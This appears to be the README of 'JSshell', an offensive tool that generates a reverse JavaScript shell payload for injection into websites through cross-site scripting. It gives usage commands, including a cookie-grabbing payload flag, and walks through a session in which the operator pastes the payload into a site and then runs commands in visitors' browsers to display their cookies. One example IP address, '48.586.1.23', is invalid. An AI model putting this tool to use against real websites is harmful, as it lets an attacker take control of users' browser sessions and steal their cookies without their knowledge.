Requirements: Any OS + Python 2 or Python 3
Updated in the new version of JShell 3.1:
>>> snippet Use CTRL+D to finish the snippet
jsh.py -p 1234
jsh.py -s 48.586.1.23 -g
jsh.py -c "alert(document.cookie)" -w 10
This is a step-by-step example of how to use JSshell.
First, we need to generate a reverse JS shell payload and set the shell timeout (e.g. 20 seconds):
~# whoami root ~# ls README.md jsh.py ~# python3 jsh.py -g -w 20 __ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website:
Access the page and we will have the reverse JS shell:
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Let execute some commands:
$ var test = 'controlled' $ confirm(test) $
And an alert will be popped up:
$ prompt(document.cookie) $
And the browser will print the user cookies:
$ exit ~# whoami root ~# pwd /home/shelld3v ~#
This is created by shelld3v!